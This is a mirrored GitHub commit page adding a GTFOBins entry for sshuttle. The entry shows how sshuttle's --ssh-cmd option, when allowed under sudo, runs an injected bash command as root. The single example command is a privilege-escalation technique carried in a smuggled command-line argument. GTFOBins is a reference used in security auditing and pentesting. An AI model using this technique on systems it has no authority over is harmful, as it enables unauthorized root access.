1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-20 23:01:33 +01:00

Merge 11c69d5497c18d783118410b35df76616069c88d into b29f2cfde1c72e4ea5191e49604e923bbda98461

This commit is contained in:
Diego Tellaroli 2025-10-20 18:56:34 +09:00 committed by GitHub
commit 5395cad76d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

7
_gtfobins/sshuttle.md Normal file

@ -0,0 +1,7 @@
---
functions:
sudo:
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id
code: |
sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3
---